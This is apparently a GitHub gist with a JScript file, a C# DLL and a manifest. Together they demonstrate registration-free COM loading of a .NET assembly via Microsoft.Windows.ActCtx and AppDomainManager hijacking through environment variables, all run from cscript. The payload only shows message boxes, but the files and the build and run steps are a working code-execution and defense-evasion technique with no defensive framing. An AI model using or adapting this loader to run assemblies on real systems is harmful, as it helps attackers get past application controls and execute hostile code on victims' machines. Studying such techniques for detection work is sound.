Skip to content

Instantly share code, notes, and snippets.

@NotMedic

NotMedic/basic.js

Created March 31, 2020 16:56
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save NotMedic/31043056d83716f73dda996c909256f8 to your computer and use it in GitHub Desktop.
Save NotMedic/31043056d83716f73dda996c909256f8 to your computer and use it in GitHub Desktop.
Download ZIP
Basic / MyDLL
Raw
basic.js
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Windows\\System32\\Tasks';
//new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_ASM') = "mydll, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null"
//new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_TYPE') = "MyAppDomainManager";
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"> <dependency><dependentAssembly> <assemblyIdentity name="tasks" version="0.0.0.0"/> </dependentAssembly> </dependency> <assemblyIdentity name="tasks" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.Operations" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5ACDC}" progid="MyDLL.Operations" runtimeVersion="v4.0.30319" threadingModel="Both" /><file name="tasks.dll"> </file></assembly>';
var ax = new ActiveXObject("Microsoft.Windows.ActCtx");
ax.ManifestText = manifest;
var dwx = ax.CreateObject("MyDLL.Operations");
WScript.StdOut.WriteLine(dwx.getValue1("a"));
WScript.StdOut.WriteLine(dwx.getValue2());
dwx.getValue3() //Trigger Message Box
Raw
mydll.cs
```
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.IO;
using System.Reflection;
using System.Runtime.Hosting;
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:mydll.dll mydll.cs
public sealed class MyAppDomainManager : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{
System.Windows.Forms.MessageBox.Show("AppDomain - KaBoomBeacon!");
// You have more control here than I am demonstrating. For example, you can own Assembly Binding, etc...
return;
}
}
namespace MyDLL
{
[ComVisible(true)]
[Guid("31D2B969-7608-426E-9D8E-A09FC9A5ACDC")]
[ClassInterface(ClassInterfaceType.None)]
[ProgId("MyDLL.Operations")]
public class Operations
{
public Operations()
{
Console.WriteLine("So It Begins");
}
[ComVisible(true)]
public string getValue1(string sParameter)
{
switch (sParameter)
{
case "a":
return "A was chosen";
case "b":
return "B was chosen";
case "c":
return "C was chosen";
default:
return "Other";
}
}
[ComVisible(true)]
public string getValue2()
{
return "From VBS String Function";
}
[ComVisible(true)]
public void getValue3()
{
System.Windows.Forms.MessageBox.Show("Hey From My Assembly");
}
}
}
/*
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:mydll.dll mydll.cs
basic.js
1. make C:\Things
2. copy cscript.exe C:\Things
3. cscript.exe basic.js
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Things';
new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_ASM') = "mydll, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null"
new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_TYPE') = "MyAppDomainManager";
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"> <assemblyIdentity name="mydll" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.Operations" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5ACDC}" progid="MyDLL.Operations" runtimeVersion="v4.0.30319" threadingModel="Both" /><file name="mydll.dll"> </file></assembly>';
var ax = new ActiveXObject("Microsoft.Windows.ActCtx");
ax.ManifestText = manifest;
var dwx = ax.CreateObject("MyDLL.Operations");
WScript.StdOut.WriteLine(dwx.getValue1("a"));
WScript.StdOut.WriteLine(dwx.getValue2());
dwx.getValue3() //Trigger Message Box
*/
```
Raw
mydll.manifest
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="0.0.0.0" name="mydll"/>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
<!--
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
-->
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
-->
</assembly>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment